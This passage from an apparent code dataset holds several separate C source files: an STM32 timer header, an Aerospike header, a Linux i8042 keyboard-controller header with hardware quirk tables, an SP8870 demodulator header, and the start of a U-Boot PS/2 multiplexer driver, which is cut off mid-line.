((uint16_t)0x0200) #define TIM_FLAG_CC2OF ((uint16_t)0x0400) #define TIM_FLAG_CC3OF ((uint16_t)0x0800) #define TIM_FLAG_CC4OF ((uint16_t)0x1000) #define IS_TIM_GET_FLAG(FLAG) (((FLAG) == TIM_FLAG_Update) || \ ((FLAG) == TIM_FLAG_CC1) || \ ((FLAG) == TIM_FLAG_CC2) || \ ((FLAG) == TIM_FLAG_CC3) || \ ((FLAG) == TIM_FLAG_CC4) || \ ((FLAG) == TIM_FLAG_COM) || \ ((FLAG) == TIM_FLAG_Trigger) || \ 
((FLAG) == TIM_FLAG_Break) || \ ((FLAG) == TIM_FLAG_CC1OF) || \ ((FLAG) == TIM_FLAG_CC2OF) || \ ((FLAG) == TIM_FLAG_CC3OF) || \ ((FLAG) == TIM_FLAG_CC4OF)) #define IS_TIM_CLEAR_FLAG(TIM_FLAG) ((((TIM_FLAG) & (uint16_t)0xE100) == 0x0000) && ((TIM_FLAG) != 0x0000)) /** * @} */ /** @defgroup TIM_Input_Capture_Filer_Value * @{ */ #define IS_TIM_IC_FILTER(ICFILTER) ((ICFILTER) <= 0xF) /** * @} */ /** @defgroup TIM_External_Trigger_Filter * @{ */ #define IS_TIM_EXT_FILTER(EXTFILTER) ((EXTFILTER) <= 0xF) /** * @} */ /** @defgroup TIM_Legacy * @{ */ #define TIM_DMABurstLength_1Byte TIM_DMABurstLength_1Transfer #define TIM_DMABurstLength_2Bytes TIM_DMABurstLength_2Transfers #define TIM_DMABurstLength_3Bytes TIM_DMABurstLength_3Transfers #define TIM_DMABurstLength_4Bytes TIM_DMABurstLength_4Transfers #define TIM_DMABurstLength_5Bytes TIM_DMABurstLength_5Transfers #define TIM_DMABurstLength_6Bytes TIM_DMABurstLength_6Transfers #define TIM_DMABurstLength_7Bytes TIM_DMABurstLength_7Transfers #define TIM_DMABurstLength_8Bytes TIM_DMABurstLength_8Transfers #define TIM_DMABurstLength_9Bytes TIM_DMABurstLength_9Transfers #define TIM_DMABurstLength_10Bytes TIM_DMABurstLength_10Transfers #define TIM_DMABurstLength_11Bytes TIM_DMABurstLength_11Transfers #define TIM_DMABurstLength_12Bytes TIM_DMABurstLength_12Transfers #define TIM_DMABurstLength_13Bytes TIM_DMABurstLength_13Transfers #define TIM_DMABurstLength_14Bytes TIM_DMABurstLength_14Transfers #define TIM_DMABurstLength_15Bytes TIM_DMABurstLength_15Transfers #define TIM_DMABurstLength_16Bytes TIM_DMABurstLength_16Transfers #define TIM_DMABurstLength_17Bytes TIM_DMABurstLength_17Transfers #define TIM_DMABurstLength_18Bytes TIM_DMABurstLength_18Transfers /** * @} */ /** * @} */ /** @defgroup TIM_Exported_Macros * @{ */ /** * @} */ /** @defgroup TIM_Exported_Functions * @{ */ void TIM_DeInit(TIM_TypeDef* TIMx); void TIM_TimeBaseInit(TIM_TypeDef* TIMx, TIM_TimeBaseInitTypeDef* TIM_TimeBaseInitStruct); void TIM_OC1Init(TIM_TypeDef* 
TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_OC2Init(TIM_TypeDef* TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_OC3Init(TIM_TypeDef* TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_OC4Init(TIM_TypeDef* TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_ICInit(TIM_TypeDef* TIMx, TIM_ICInitTypeDef* TIM_ICInitStruct); void TIM_PWMIConfig(TIM_TypeDef* TIMx, TIM_ICInitTypeDef* TIM_ICInitStruct); void TIM_BDTRConfig(TIM_TypeDef* TIMx, TIM_BDTRInitTypeDef *TIM_BDTRInitStruct); void TIM_TimeBaseStructInit(TIM_TimeBaseInitTypeDef* TIM_TimeBaseInitStruct); void TIM_OCStructInit(TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_ICStructInit(TIM_ICInitTypeDef* TIM_ICInitStruct); void TIM_BDTRStructInit(TIM_BDTRInitTypeDef* TIM_BDTRInitStruct); void TIM_Cmd(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_CtrlPWMOutputs(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_ITConfig(TIM_TypeDef* TIMx, uint16_t TIM_IT, FunctionalState NewState); void TIM_GenerateEvent(TIM_TypeDef* TIMx, uint16_t TIM_EventSource); void TIM_DMAConfig(TIM_TypeDef* TIMx, uint16_t TIM_DMABase, uint16_t TIM_DMABurstLength); void TIM_DMACmd(TIM_TypeDef* TIMx, uint16_t TIM_DMASource, FunctionalState NewState); void TIM_InternalClockConfig(TIM_TypeDef* TIMx); void TIM_ITRxExternalClockConfig(TIM_TypeDef* TIMx, uint16_t TIM_InputTriggerSource); void TIM_TIxExternalClockConfig(TIM_TypeDef* TIMx, uint16_t TIM_TIxExternalCLKSource, uint16_t TIM_ICPolarity, uint16_t ICFilter); void TIM_ETRClockMode1Config(TIM_TypeDef* TIMx, uint16_t TIM_ExtTRGPrescaler, uint16_t TIM_ExtTRGPolarity, uint16_t ExtTRGFilter); void TIM_ETRClockMode2Config(TIM_TypeDef* TIMx, uint16_t TIM_ExtTRGPrescaler, uint16_t TIM_ExtTRGPolarity, uint16_t ExtTRGFilter); void TIM_ETRConfig(TIM_TypeDef* TIMx, uint16_t TIM_ExtTRGPrescaler, uint16_t TIM_ExtTRGPolarity, uint16_t ExtTRGFilter); void TIM_PrescalerConfig(TIM_TypeDef* TIMx, uint16_t Prescaler, uint16_t TIM_PSCReloadMode); void TIM_CounterModeConfig(TIM_TypeDef* 
TIMx, uint16_t TIM_CounterMode); void TIM_SelectInputTrigger(TIM_TypeDef* TIMx, uint16_t TIM_InputTriggerSource); void TIM_EncoderInterfaceConfig(TIM_TypeDef* TIMx, uint16_t TIM_EncoderMode, uint16_t TIM_IC1Polarity, uint16_t TIM_IC2Polarity); void TIM_ForcedOC1Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ForcedOC2Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ForcedOC3Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ForcedOC4Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ARRPreloadConfig(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_SelectCOM(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_SelectCCDMA(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_CCPreloadControl(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_OC1PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC2PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC3PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC4PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC1FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_OC2FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_OC3FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_OC4FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_ClearOC1Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_ClearOC2Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_ClearOC3Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_ClearOC4Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_OC1PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void TIM_OC1NPolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCNPolarity); void TIM_OC2PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void TIM_OC2NPolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCNPolarity); void TIM_OC3PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void 
TIM_OC3NPolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCNPolarity); void TIM_OC4PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void TIM_CCxCmd(TIM_TypeDef* TIMx, uint16_t TIM_Channel, uint16_t TIM_CCx); void TIM_CCxNCmd(TIM_TypeDef* TIMx, uint16_t TIM_Channel, uint16_t TIM_CCxN); void TIM_SelectOCxM(TIM_TypeDef* TIMx, uint16_t TIM_Channel, uint16_t TIM_OCMode); void TIM_UpdateDisableConfig(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_UpdateRequestConfig(TIM_TypeDef* TIMx, uint16_t TIM_UpdateSource); void TIM_SelectHallSensor(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_SelectOnePulseMode(TIM_TypeDef* TIMx, uint16_t TIM_OPMode); void TIM_SelectOutputTrigger(TIM_TypeDef* TIMx, uint16_t TIM_TRGOSource); void TIM_SelectSlaveMode(TIM_TypeDef* TIMx, uint16_t TIM_SlaveMode); void TIM_SelectMasterSlaveMode(TIM_TypeDef* TIMx, uint16_t TIM_MasterSlaveMode); void TIM_SetCounter(TIM_TypeDef* TIMx, uint16_t Counter); void TIM_SetAutoreload(TIM_TypeDef* TIMx, uint16_t Autoreload); void TIM_SetCompare1(TIM_TypeDef* TIMx, uint16_t Compare1); void TIM_SetCompare2(TIM_TypeDef* TIMx, uint16_t Compare2); void TIM_SetCompare3(TIM_TypeDef* TIMx, uint16_t Compare3); void TIM_SetCompare4(TIM_TypeDef* TIMx, uint16_t Compare4); void TIM_SetIC1Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetIC2Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetIC3Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetIC4Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetClockDivision(TIM_TypeDef* TIMx, uint16_t TIM_CKD); uint16_t TIM_GetCapture1(TIM_TypeDef* TIMx); uint16_t TIM_GetCapture2(TIM_TypeDef* TIMx); uint16_t TIM_GetCapture3(TIM_TypeDef* TIMx); uint16_t TIM_GetCapture4(TIM_TypeDef* TIMx); uint16_t TIM_GetCounter(TIM_TypeDef* TIMx); uint16_t TIM_GetPrescaler(TIM_TypeDef* TIMx); FlagStatus TIM_GetFlagStatus(TIM_TypeDef* TIMx, uint16_t TIM_FLAG); void TIM_ClearFlag(TIM_TypeDef* TIMx, uint16_t TIM_FLAG); ITStatus 
TIM_GetITStatus(TIM_TypeDef* TIMx, uint16_t TIM_IT); void TIM_ClearITPendingBit(TIM_TypeDef* TIMx, uint16_t TIM_IT); #ifdef __cplusplus } #endif #endif /*__STM32F10x_TIM_H */ /** * @} */ /** * @} */ /** * @} */ /******************* (C) COPYRIGHT 2011 STMicroelectronics *****END OF FILE****/
{ "language": "C" }
/* * service_list.h * * Copyright (C) 2017-2018 Aerospike, Inc. * * Portions may be licensed to Aerospike, Inc. under one or more contributor * license agreements. * * This program is free software: you can redistribute it and/or modify it under * the terms of the GNU Affero General Public License as published by the Free * Software Foundation, either version 3 of the License, or (at your option) any * later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more * details. * * You should have received a copy of the GNU Affero General Public License * along with this program. If not, see http://www.gnu.org/licenses/ */ #pragma once //========================================================== // Includes. // #include <stdint.h> #include "dynbuf.h" //========================================================== // Public API. // void as_service_list_init(void); int32_t as_service_list_dynamic(char *key, cf_dyn_buf *db); int32_t as_service_list_command(char *key, char *par, cf_dyn_buf *db);
{ "language": "C" }
#ifndef _I8042_X86IA64IO_H #define _I8042_X86IA64IO_H /* * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 as published by * the Free Software Foundation. */ /* * Names. */ #define I8042_KBD_PHYS_DESC "isa0060/serio0" #define I8042_AUX_PHYS_DESC "isa0060/serio1" #define I8042_MUX_PHYS_DESC "isa0060/serio%d" /* * IRQs. */ #if defined(__ia64__) # define I8042_MAP_IRQ(x) isa_irq_to_vector((x)) #else # define I8042_MAP_IRQ(x) (x) #endif #define I8042_KBD_IRQ i8042_kbd_irq #define I8042_AUX_IRQ i8042_aux_irq static int i8042_kbd_irq; static int i8042_aux_irq; /* * Register numbers. */ #define I8042_COMMAND_REG i8042_command_reg #define I8042_STATUS_REG i8042_command_reg #define I8042_DATA_REG i8042_data_reg static int i8042_command_reg = 0x64; static int i8042_data_reg = 0x60; static inline int i8042_read_data(void) { return inb(I8042_DATA_REG); } static inline int i8042_read_status(void) { return inb(I8042_STATUS_REG); } static inline void i8042_write_data(int val) { outb(val, I8042_DATA_REG); } static inline void i8042_write_command(int val) { outb(val, I8042_COMMAND_REG); } #if defined(__i386__) #include <linux/dmi.h> static struct dmi_system_id __initdata i8042_dmi_noloop_table[] = { { /* AUX LOOP command does not raise AUX IRQ */ .ident = "ASUS P65UP5", .matches = { DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK Computer INC."), DMI_MATCH(DMI_BOARD_NAME, "P/I-P65UP5"), DMI_MATCH(DMI_BOARD_VERSION, "REV 2.X"), }, }, { .ident = "Compaq Proliant 8500", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Compaq"), DMI_MATCH(DMI_PRODUCT_NAME , "ProLiant"), DMI_MATCH(DMI_PRODUCT_VERSION, "8500"), }, }, { .ident = "Compaq Proliant DL760", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Compaq"), DMI_MATCH(DMI_PRODUCT_NAME , "ProLiant"), DMI_MATCH(DMI_PRODUCT_VERSION, "DL760"), }, }, { .ident = "OQO Model 01", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "OQO"), DMI_MATCH(DMI_PRODUCT_NAME, "ZEPTO"), 
DMI_MATCH(DMI_PRODUCT_VERSION, "00"), }, }, { /* AUX LOOP does not work properly */ .ident = "ULI EV4873", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "ULI"), DMI_MATCH(DMI_PRODUCT_NAME, "EV4873"), DMI_MATCH(DMI_PRODUCT_VERSION, "5a"), }, }, { } }; /* * Some Fujitsu notebooks are having trouble with touchpads if * active multiplexing mode is activated. Luckily they don't have * external PS/2 ports so we can safely disable it. * ... apparently some Toshibas don't like MUX mode either and * die horrible death on reboot. */ static struct dmi_system_id __initdata i8042_dmi_nomux_table[] = { { .ident = "Fujitsu Lifebook P7010/P7010D", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "P7010"), }, }, { .ident = "Fujitsu Lifebook P7010", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU SIEMENS"), DMI_MATCH(DMI_PRODUCT_NAME, "0000000000"), }, }, { .ident = "Fujitsu Lifebook P5020D", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook P Series"), }, }, { .ident = "Fujitsu Lifebook S2000", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook S Series"), }, }, { .ident = "Fujitsu Lifebook S6230", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook S6230"), }, }, { .ident = "Fujitsu T70H", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "FMVLT70H"), }, }, { .ident = "Fujitsu-Siemens Lifebook T3010", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU SIEMENS"), DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK T3010"), }, }, { .ident = "Fujitsu-Siemens Lifebook E4010", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU SIEMENS"), DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK E4010"), }, }, { /* * No data is coming from the touchscreen unless KBC * is in legacy mode. 
*/ .ident = "Panasonic CF-29", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Matsushita"), DMI_MATCH(DMI_PRODUCT_NAME, "CF-29"), }, }, { /* * Errors on MUX ports are reported without raising AUXDATA * causing "spurious NAK" messages. */ .ident = "HP Pavilion DV4017EA", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"), DMI_MATCH(DMI_PRODUCT_NAME, "Pavilion dv4000 (EA032EA#ABF)"), }, }, { /* * Like DV4017EA does not raise AUXERR for errors on MUX ports. */ .ident = "HP Pavilion ZT1000", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"), DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Notebook PC"), DMI_MATCH(DMI_PRODUCT_VERSION, "HP Pavilion Notebook ZT1000"), }, }, { .ident = "Toshiba P10", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"), DMI_MATCH(DMI_PRODUCT_NAME, "Satellite P10"), }, }, { .ident = "Toshiba Equium A110", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"), DMI_MATCH(DMI_PRODUCT_NAME, "EQUIUM A110"), }, }, { .ident = "Alienware Sentia", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "ALIENWARE"), DMI_MATCH(DMI_PRODUCT_NAME, "Sentia"), }, }, { .ident = "Sharp Actius MM20", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "SHARP"), DMI_MATCH(DMI_PRODUCT_NAME, "PC-MM20 Series"), }, }, { .ident = "Sony Vaio FS-115b", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"), DMI_MATCH(DMI_PRODUCT_NAME, "VGN-FS115B"), }, }, { .ident = "Amoi M636/A737", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Amoi Electronics CO.,LTD."), DMI_MATCH(DMI_PRODUCT_NAME, "M636/A737 platform"), }, }, { } }; #endif #ifdef CONFIG_PNP #include <linux/pnp.h> static int i8042_pnp_kbd_registered; static unsigned int i8042_pnp_kbd_devices; static int i8042_pnp_aux_registered; static unsigned int i8042_pnp_aux_devices; static int i8042_pnp_command_reg; static int i8042_pnp_data_reg; static int i8042_pnp_kbd_irq; static int i8042_pnp_aux_irq; static char i8042_pnp_kbd_name[32]; static char i8042_pnp_aux_name[32]; static int i8042_pnp_kbd_probe(struct pnp_dev *dev, const struct pnp_device_id *did) { 
if (pnp_port_valid(dev, 0) && pnp_port_len(dev, 0) == 1) i8042_pnp_data_reg = pnp_port_start(dev,0); if (pnp_port_valid(dev, 1) && pnp_port_len(dev, 1) == 1) i8042_pnp_command_reg = pnp_port_start(dev, 1); if (pnp_irq_valid(dev,0)) i8042_pnp_kbd_irq = pnp_irq(dev, 0); strncpy(i8042_pnp_kbd_name, did->id, sizeof(i8042_pnp_kbd_name)); if (strlen(pnp_dev_name(dev))) { strncat(i8042_pnp_kbd_name, ":", sizeof(i8042_pnp_kbd_name)); strncat(i8042_pnp_kbd_name, pnp_dev_name(dev), sizeof(i8042_pnp_kbd_name)); } i8042_pnp_kbd_devices++; return 0; } static int i8042_pnp_aux_probe(struct pnp_dev *dev, const struct pnp_device_id *did) { if (pnp_port_valid(dev, 0) && pnp_port_len(dev, 0) == 1) i8042_pnp_data_reg = pnp_port_start(dev,0); if (pnp_port_valid(dev, 1) && pnp_port_len(dev, 1) == 1) i8042_pnp_command_reg = pnp_port_start(dev, 1); if (pnp_irq_valid(dev, 0)) i8042_pnp_aux_irq = pnp_irq(dev, 0); strncpy(i8042_pnp_aux_name, did->id, sizeof(i8042_pnp_aux_name)); if (strlen(pnp_dev_name(dev))) { strncat(i8042_pnp_aux_name, ":", sizeof(i8042_pnp_aux_name)); strncat(i8042_pnp_aux_name, pnp_dev_name(dev), sizeof(i8042_pnp_aux_name)); } i8042_pnp_aux_devices++; return 0; } static struct pnp_device_id pnp_kbd_devids[] = { { .id = "PNP0303", .driver_data = 0 }, { .id = "PNP030b", .driver_data = 0 }, { .id = "", }, }; static struct pnp_driver i8042_pnp_kbd_driver = { .name = "i8042 kbd", .id_table = pnp_kbd_devids, .probe = i8042_pnp_kbd_probe, }; static struct pnp_device_id pnp_aux_devids[] = { { .id = "FJC6000", .driver_data = 0 }, { .id = "FJC6001", .driver_data = 0 }, { .id = "PNP0f03", .driver_data = 0 }, { .id = "PNP0f0b", .driver_data = 0 }, { .id = "PNP0f0e", .driver_data = 0 }, { .id = "PNP0f12", .driver_data = 0 }, { .id = "PNP0f13", .driver_data = 0 }, { .id = "PNP0f19", .driver_data = 0 }, { .id = "PNP0f1c", .driver_data = 0 }, { .id = "SYN0801", .driver_data = 0 }, { .id = "", }, }; static struct pnp_driver i8042_pnp_aux_driver = { .name = "i8042 aux", .id_table = 
pnp_aux_devids, .probe = i8042_pnp_aux_probe, }; static void i8042_pnp_exit(void) { if (i8042_pnp_kbd_registered) { i8042_pnp_kbd_registered = 0; pnp_unregister_driver(&i8042_pnp_kbd_driver); } if (i8042_pnp_aux_registered) { i8042_pnp_aux_registered = 0; pnp_unregister_driver(&i8042_pnp_aux_driver); } } static int __init i8042_pnp_init(void) { char kbd_irq_str[4] = { 0 }, aux_irq_str[4] = { 0 }; int err; if (i8042_nopnp) { printk(KERN_INFO "i8042: PNP detection disabled\n"); return 0; } err = pnp_register_driver(&i8042_pnp_kbd_driver); if (!err) i8042_pnp_kbd_registered = 1; err = pnp_register_driver(&i8042_pnp_aux_driver); if (!err) i8042_pnp_aux_registered = 1; if (!i8042_pnp_kbd_devices && !i8042_pnp_aux_devices) { i8042_pnp_exit(); #if defined(__ia64__) return -ENODEV; #else printk(KERN_INFO "PNP: No PS/2 controller found. Probing ports directly.\n"); return 0; #endif } if (i8042_pnp_kbd_devices) snprintf(kbd_irq_str, sizeof(kbd_irq_str), "%d", i8042_pnp_kbd_irq); if (i8042_pnp_aux_devices) snprintf(aux_irq_str, sizeof(aux_irq_str), "%d", i8042_pnp_aux_irq); printk(KERN_INFO "PNP: PS/2 Controller [%s%s%s] at %#x,%#x irq %s%s%s\n", i8042_pnp_kbd_name, (i8042_pnp_kbd_devices && i8042_pnp_aux_devices) ? "," : "", i8042_pnp_aux_name, i8042_pnp_data_reg, i8042_pnp_command_reg, kbd_irq_str, (i8042_pnp_kbd_devices && i8042_pnp_aux_devices) ? 
"," : "", aux_irq_str); #if defined(__ia64__) if (!i8042_pnp_kbd_devices) i8042_nokbd = 1; if (!i8042_pnp_aux_devices) i8042_noaux = 1; #endif if (((i8042_pnp_data_reg & ~0xf) == (i8042_data_reg & ~0xf) && i8042_pnp_data_reg != i8042_data_reg) || !i8042_pnp_data_reg) { printk(KERN_WARNING "PNP: PS/2 controller has invalid data port %#x; using default %#x\n", i8042_pnp_data_reg, i8042_data_reg); i8042_pnp_data_reg = i8042_data_reg; } if (((i8042_pnp_command_reg & ~0xf) == (i8042_command_reg & ~0xf) && i8042_pnp_command_reg != i8042_command_reg) || !i8042_pnp_command_reg) { printk(KERN_WARNING "PNP: PS/2 controller has invalid command port %#x; using default %#x\n", i8042_pnp_command_reg, i8042_command_reg); i8042_pnp_command_reg = i8042_command_reg; } if (!i8042_nokbd && !i8042_pnp_kbd_irq) { printk(KERN_WARNING "PNP: PS/2 controller doesn't have KBD irq; using default %d\n", i8042_kbd_irq); i8042_pnp_kbd_irq = i8042_kbd_irq; } if (!i8042_noaux && !i8042_pnp_aux_irq) { printk(KERN_WARNING "PNP: PS/2 controller doesn't have AUX irq; using default %d\n", i8042_aux_irq); i8042_pnp_aux_irq = i8042_aux_irq; } i8042_data_reg = i8042_pnp_data_reg; i8042_command_reg = i8042_pnp_command_reg; i8042_kbd_irq = i8042_pnp_kbd_irq; i8042_aux_irq = i8042_pnp_aux_irq; return 0; } #else static inline int i8042_pnp_init(void) { return 0; } static inline void i8042_pnp_exit(void) { } #endif static int __init i8042_platform_init(void) { int retval; /* * On ix86 platforms touching the i8042 data register region can do really * bad things. Because of this the region is always reserved on ix86 boxes. 
* * if (!request_region(I8042_DATA_REG, 16, "i8042")) * return -EBUSY; */ i8042_kbd_irq = I8042_MAP_IRQ(1); i8042_aux_irq = I8042_MAP_IRQ(12); retval = i8042_pnp_init(); if (retval) return retval; #if defined(__ia64__) i8042_reset = 1; #endif #if defined(__i386__) if (dmi_check_system(i8042_dmi_noloop_table)) i8042_noloop = 1; if (dmi_check_system(i8042_dmi_nomux_table)) i8042_nomux = 1; #endif return retval; } static inline void i8042_platform_exit(void) { i8042_pnp_exit(); } #endif /* _I8042_X86IA64IO_H */
{ "language": "C" }
/*
    Driver for Spase SP8870 demodulator

    Copyright (C) 1999 Juergen Peitz

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

*/

#ifndef SP8870_H
#define SP8870_H

#include <linux/dvb/frontend.h>
#include <linux/firmware.h>

// Board-specific configuration handed to sp8870_attach() by the adapter
// driver that owns this demodulator.
struct sp8870_config
{
	/* the demodulator's i2c address */
	u8 demod_address;

	/* request firmware for device */
	// Callback supplied by the adapter driver to fetch the firmware image
	// named 'name' on behalf of frontend 'fe'; expected to return 0 on
	// success and populate *fw (standard request_firmware() contract —
	// confirm against callers).
	int (*request_firmware)(struct dvb_frontend* fe, const struct firmware **fw, char* name);
};

#if defined(CONFIG_DVB_SP8870) || (defined(CONFIG_DVB_SP8870_MODULE) && defined(MODULE))
// Probe and attach an SP8870 demodulator on i2c bus 'i2c' using 'config'.
// Returns a frontend handle on success, NULL on failure.
extern struct dvb_frontend* sp8870_attach(const struct sp8870_config* config,
					  struct i2c_adapter* i2c);
#else
// Stub used when the driver is not enabled in Kconfig: logs a warning and
// reports failure so callers degrade gracefully.
static inline struct dvb_frontend* sp8870_attach(const struct sp8870_config* config,
					  struct i2c_adapter* i2c)
{
	printk(KERN_WARNING "%s: driver disabled by Kconfig\n", __func__);
	return NULL;
}
#endif // CONFIG_DVB_SP8870

#endif // SP8870_H
{ "language": "C" }
/*********************************************************************** * * (C) Copyright 2004 * DENX Software Engineering * Wolfgang Denk, wd@denx.de * * PS/2 multiplexer driver * * Originally from linux source (drivers/char/ps2mult.c) * * Uses simple serial driver (ps2ser.c) to access the multiplexer * Used by PS/2 keyboard driver (pc_keyb.c) * ***********************************************************************/ #include <common.h> #include <pc_keyb.h> #include <asm/atomic.h> #include <ps2mult.h> /* #define DEBUG_MULT */ /* #define DEBUG_KEYB */ #define KBD_STAT_DEFAULT (KBD_STAT_SELFTEST | KBD_STAT_UNLOCKED) #define PRINTF(format, args...) printf("ps2mult.c: " format, ## args) #ifdef DEBUG_MULT #define PRINTF_MULT(format, args...) printf("PS2MULT: " format, ## args) #else #define PRINTF_MULT(format, args...) #endif #ifdef DEBUG_KEYB #define PRINTF_KEYB(format, args...) printf("KEYB: " format, ## args) #else #define PRINTF_KEYB(format, args...) #endif static ulong start_time; static int init_done = 0; static int received_escape = 0; static int received_bsync = 0; static int received_selector = 0; static int kbd_command_active = 0; static int mouse_command_active = 0; static int ctl_command_active = 0; static u_char command_byte = 0; static void (*keyb_handler)(void *dev_id); static u_char ps2mult_buf [PS2BUF_SIZE]; static atomic_t ps2mult_buf_cnt; static int ps2mult_buf_in_idx; static int ps2mult_buf_out_idx; static u_char ps2mult_buf_status [PS2BUF_SIZE]; #ifndef CONFIG_BOARD_EARLY_INIT_R #error #define CONFIG_BOARD_EARLY_INIT_R and call ps2mult_early_init() in board_early_init_r() #endif void ps2mult_early_init (void) { start_time = get_timer(0); } static void ps2mult_send_byte(u_char byte, u_char sel) { ps2ser_putc(sel); if (sel == PS2MULT_KB_SELECTOR) { PRINTF_MULT("0x%02x send KEYBOARD\n", byte); kbd_command_active = 1; } else { PRINTF_MULT("0x%02x send MOUSE\n", byte); mouse_command_active = 1; } switch (byte) { case PS2MULT_ESCAPE: case PS2MULT_BSYNC: 
case PS2MULT_KB_SELECTOR: case PS2MULT_MS_SELECTOR: case PS2MULT_SESSION_START: case PS2MULT_SESSION_END: ps2ser_putc(PS2MULT_ESCAPE); break; default: break; } ps2ser_putc(byte); } static void ps2mult_receive_byte(u_char byte, u_char sel) { u_char status = KBD_STAT_DEFAULT; #if 1 /* Ignore mouse in U-Boot */ if (sel == PS2MULT_MS_SELECTOR) return; #endif if (sel == PS2MULT_KB_SELECTOR) { if (kbd_command_active) { if (!received_bsync) { PRINTF_MULT("0x%02x lost KEYBOARD !!!\n", byte); return; } else { kbd_command_active = 0; received_bsync = 0; } } PRINTF_MULT("0x%02x receive KEYBOARD\n", byte); status |= KBD_STAT_IBF | KBD_STAT_OBF; } else { if (mouse_command_active) { if (!received_bsync) { PRINTF_MULT("0x%02x lost MOUSE !!!\n", byte); return; } else { mouse_command_active = 0; received_bsync = 0; } } PRINTF_MULT("0x%02x receive MOUSE\n", byte); status |= KBD_STAT_IBF | KBD_STAT_OBF | KBD_STAT_MOUSE_OBF; } if (atomic_read(&ps2mult_buf_cnt) < PS2BUF_SIZE) { ps2mult_buf_status[ps2mult_buf_in_idx] = status; ps2mult_buf[ps2mult_buf_in_idx++] = 